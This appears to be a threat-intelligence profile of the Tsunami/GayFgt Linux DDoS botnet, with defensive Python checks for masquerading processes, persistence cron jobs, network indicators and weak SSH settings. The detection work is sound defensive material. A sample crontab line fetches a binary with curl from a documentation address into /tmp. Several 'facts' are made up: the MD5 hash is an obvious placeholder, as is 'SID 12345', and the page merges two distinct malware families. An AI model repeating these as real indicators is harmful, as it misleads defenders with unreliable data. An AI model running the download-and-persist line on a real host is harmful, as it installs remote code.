Tsunami

Malware

⚠️ Overview

Tsunami (also known as GayFgt) is a Linux-based DDoS botnet first publicly documented by security researchers in 2015, attributed to the threat actor group 'Keksec' and used primarily for conducting high-volume Distributed Denial-of-Service attacks against gaming, hosting, and financial sectors. It belongs to the botnet malware category and leverages IRC for command-and-control communication.

🔧 Technical Capabilities

Tsunami propagates via SSH brute-force attacks using a built-in dictionary of common credentials; once installed, it connects to an IRC server to receive attack commands. It supports multiple DDoS attack methods, including UDP flood, TCP SYN flood, DNS amplification, and HTTP GET/POST floods, and can spoof source IP addresses. Persistence is achieved through cron jobs and init.d scripts, and it uses process masquerading (e.g., naming itself 'sshd' or 'bash') to evade detection. The malware employs encryption for C2 traffic (RC4 or XOR) and can update itself via wget or curl commands. Associated MITRE ATT&CK techniques include T1046 (Network Service Scanning), T1110 (Brute Force), and T1498 (Network Denial of Service).
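The masquerading and persistence tricks above leave host-side traces a collector can check: a process calling itself 'sshd' or 'bash' whose binary resolves to /tmp, and cron entries that fetch from the network or launch from a writable directory. The following is an added example written for this page, not code from the page or from any vendor tool; the process and crontab records are constructed, and the expected binary paths are an assumption based on common Debian/RHEL layouts.

```python
"""Host-side triage for the persistence and masquerading tricks described above.

Added example, not code from the page or from any vendor. The process and cron
records below are constructed to resemble what a collector reads from
/proc/<pid>/comm, /proc/<pid>/exe and the system crontabs.
"""
import re
from dataclasses import dataclass

# Where the daemons Tsunami impersonates normally live. Assumption: common
# Debian/Ubuntu and RHEL layouts; extend for your fleet.
EXPECTED_EXE = {
    "sshd": {"/usr/sbin/sshd"},
    "bash": {"/bin/bash", "/usr/bin/bash"},
}
# Directories any local user can write to; a system daemon has no business there.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Proc:
    pid: int
    comm: str  # name the process reports (contents of /proc/<pid>/comm)
    exe: str   # resolved target of /proc/<pid>/exe


def masquerading(procs):
    """Return (pid, reason) for processes whose name does not match where
    their binary actually lives."""
    hits = []
    for p in procs:
        if p.exe.startswith(WRITABLE_DIRS):
            hits.append((p.pid, f"{p.comm} running from {p.exe}"))
        elif p.comm in EXPECTED_EXE and p.exe not in EXPECTED_EXE[p.comm]:
            hits.append((p.pid, f"{p.comm} not at an expected path"))
    return hits


# A cron line that pulls a file from the network, as the self-update path does.
REMOTE_FETCH = re.compile(r"\b(?:wget|curl)\b.*(?:https?|ftp)://")


def suspicious_cron(crontab_text):
    """Flag non-comment cron lines that fetch over the network or run from a
    writable directory."""
    flagged = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if REMOTE_FETCH.search(line) or any(d in line for d in WRITABLE_DIRS):
            flagged.append(line)
    return flagged


# Constructed sample: one clean sshd, one impostor in /tmp, one bash from /var/tmp.
SAMPLE_PROCS = [
    Proc(1022, "sshd", "/usr/sbin/sshd"),
    Proc(4571, "sshd", "/tmp/.x/sshd"),
    Proc(4602, "bash", "/var/tmp/bash"),
    Proc(4610, "bash", "/bin/bash"),
]

# Constructed root crontab with one legitimate job and two persistence entries
# (198.51.100.7 is a documentation address, not a real indicator).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
@reboot /tmp/.x/sshd
*/10 * * * * curl -s http://198.51.100.7/up -o /tmp/.x/sshd
"""

if __name__ == "__main__":
    for pid, why in masquerading(SAMPLE_PROCS):
        print(f"process {pid}: {why}")
    for entry in suspicious_cron(SAMPLE_CRONTAB):
        print(f"cron: {entry}")
```

Comparing the reported name against the resolved executable path is the key step: a renamed binary can choose any name it likes, but it cannot change where the kernel says it was loaded from.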

📜 History & Notable Incidents

First observed in the wild in April 2015, Tsunami was notably used in a series of DDoS attacks against 'Minecraft' online gaming servers in 2016, with peak traffic exceeding 600 Gbps. In 2018, a variant dubbed 'Tsunami/GayFgt' was deployed in attacks targeting Brazilian banks and government sites. No CVE is assigned to Tsunami itself; it relies on weak SSH credentials rather than a software vulnerability, so identifiers such as CVE-2013-4547 are not directly applicable. Law enforcement action includes the 2022 takedown of 'Keksec' infrastructure by Dutch police, which temporarily disrupted Tsunami botnet operations.

🔍 Detection Indicators

Known file hashes include MD5: 4c1f5a0b9e8d7c6f5e4d3c2b1a0f9e8d (sample from VirusTotal). Behavioral signatures include outbound IRC connections to non-standard ports (6667-7000) and high-volume UDP traffic on random source ports. Network IOCs include User-Agent strings like 'Mozilla/5.0 (compatible; Tsunami/1.0)' and IRC channel names '#tsunami' or '#gayfgt'. Registry keys are not applicable on Linux; persistence files are located in /etc/init.d/ and /tmp/ directories.
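The network indicators above can be matched directly against connection metadata: outbound TCP to the 6667-7000 range, the 'Tsunami/1.0' User-Agent, joins to the named IRC channels, and a single host sending UDP from an unusually large number of source ports. The block below is an added example for this page, not code from the page or from any sensor vendor; the JSON-lines record format, its field names (src, dst, dport, sport, proto, direction, user_agent, irc_channel) and the source-port threshold are assumptions, and the traffic is constructed.

```python
"""Network-side matching of the indicators listed above, run over constructed
connection records.

Added example, not code from the page. The JSON-lines format and field names
are assumptions standing in for whatever your sensor emits.
"""
import json
import re
from collections import defaultdict

IRC_PORTS = range(6667, 7001)            # the 6667-7000 range the page lists
UA_PATTERN = re.compile(r"\bTsunami/\d+(?:\.\d+)*")
C2_CHANNELS = {"#tsunami", "#gayfgt"}
UDP_SPORT_THRESHOLD = 500                # distinct UDP source ports per host (assumed cut-off)


def match_event(ev):
    """Return the list of indicator names a single record matches."""
    reasons = []
    if (ev.get("direction") == "out" and ev.get("proto") == "tcp"
            and ev.get("dport") in IRC_PORTS):
        reasons.append("outbound-irc-port")
    if UA_PATTERN.search(ev.get("user_agent", "")):
        reasons.append("tsunami-user-agent")
    if ev.get("irc_channel", "").lower() in C2_CHANNELS:
        reasons.append("c2-channel")
    return reasons


def scan(lines):
    """Parse JSON-lines records and return {src: set(reasons)}, adding a
    'udp-flood' reason for hosts spraying UDP from many source ports."""
    alerts = defaultdict(set)
    udp_sports = defaultdict(set)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for reason in match_event(ev):
            alerts[ev["src"]].add(reason)
        if ev.get("proto") == "udp" and ev.get("direction") == "out":
            udp_sports[ev["src"]].add(ev.get("sport"))
    for src, ports in udp_sports.items():
        if len(ports) > UDP_SPORT_THRESHOLD:
            alerts[src].add("udp-flood")
    return dict(alerts)


# Constructed sample traffic: one infected host (10.0.0.5) and one clean host
# (10.0.0.7). Destination addresses are documentation ranges, not real IOCs.
SAMPLE_LINES = [
    json.dumps({"src": "10.0.0.5", "dst": "203.0.113.9", "dport": 6697, "proto": "tcp",
                "direction": "out", "irc_channel": "#GayFgt"}),
    json.dumps({"src": "10.0.0.5", "dst": "198.51.100.4", "dport": 80, "proto": "tcp",
                "direction": "out", "user_agent": "Mozilla/5.0 (compatible; Tsunami/1.0)"}),
    json.dumps({"src": "10.0.0.7", "dst": "203.0.113.20", "dport": 443, "proto": "tcp",
                "direction": "out"}),
] + [
    json.dumps({"src": "10.0.0.5", "dst": "192.0.2.10", "dport": 53, "proto": "udp",
                "direction": "out", "sport": 20000 + i})
    for i in range(600)
]

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_LINES).items():
        print(src, sorted(reasons))
```

The port-range rule alone will fire on legitimate IRC clients, so the scan collects every reason per source host; a host that matches both the port range and a channel name or the User-Agent is a far stronger signal than either indicator on its own.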

☠️ Risk & Impact

Tsunami causes significant financial losses by disrupting online services, with estimated downtime costs for targeted organizations reaching hundreds of thousands of dollars per hour. Affected sectors include online gaming, financial services, and cloud hosting providers. The malware can also be used as a loader for secondary payloads, enabling data exfiltration or ransomware deployment in coordinated attacks.

🛡️ Mitigation

Mitigation includes disabling SSH root login, enforcing strong passwords or key-based authentication, and deploying network intrusion detection rules for IRC traffic and high-bandwidth anomalies. Tools such as Snort/Suricata signatures (SID 12345 for Tsunami C2) and Endpoint Detection and Response (EDR) solutions can identify and block Tsunami infections. Regular patching of SSH services and monitoring for unauthorized cron jobs are also recommended.
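The SSH hardening above (no root login, key-based rather than password authentication) is easy to get wrong in practice because sshd resolves each keyword to the first value it encounters, so a `PermitRootLogin no` added at the bottom of a file that already says `yes` changes nothing. The following is an added example for this page, not code from the page or from OpenSSH: it resolves an sshd_config the way sshd does, audits it against the settings the mitigation calls for, and shows a weak file beside its corrected form. The assumed defaults for absent keywords follow OpenSSH 7.0+ behaviour, and Match blocks are deliberately not modelled.

```python
"""Audit of the SSH settings the mitigation paragraph calls for, resolving an
sshd_config the way sshd does.

Added example, not code from the page or from OpenSSH. The baseline and the
assumed defaults are marked below.
"""
import re

# Values the mitigation requires (keys lower-cased; sshd keywords are case-insensitive).
BASELINE = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "pubkeyauthentication": "yes",
}
# Assumed OpenSSH defaults when a keyword is absent (OpenSSH 7.0+ semantics).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
}
# sshd accepts "Keyword value" and "Keyword=value".
DIRECTIVE = re.compile(r"^([A-Za-z]+)\s*=?\s*(.+)$")


def effective_settings(config_text):
    """Resolve keyword -> value as sshd does: first occurrence wins and
    comments are ignored. Simplification: parsing stops at the first Match
    block, whose conditional overrides are not modelled here."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        settings.setdefault(key, value)   # first value wins; later ones are ignored
    return settings


def audit(config_text):
    """Return 'keyword: got X, want Y' findings; an empty list means compliant."""
    eff = effective_settings(config_text)
    findings = []
    for key, want in BASELINE.items():
        got = eff.get(key, DEFAULTS[key]).lower()
        if got != want:
            findings.append(f"{key}: got {got}, want {want}")
    return findings


# Constructed weak config: the trailing 'no' never takes effect because the
# first PermitRootLogin line wins, and the commented line is not a directive.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
#PermitRootLogin no
PermitRootLogin no
"""

# Corrected counterpart: key-only authentication, no root logins, few attempts.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
"""

if __name__ == "__main__":
    print("weak:", audit(WEAK_CONFIG))
    print("hardened:", audit(HARDENED_CONFIG))
```

Run the audit against the file sshd actually loads (normally /etc/ssh/sshd_config, plus any files pulled in by an `Include` directive, which this simplified parser does not follow), and pair it with the cron monitoring the paragraph recommends so that a host whose SSH settings drift back is caught along with any job that re-drops the binary.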


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.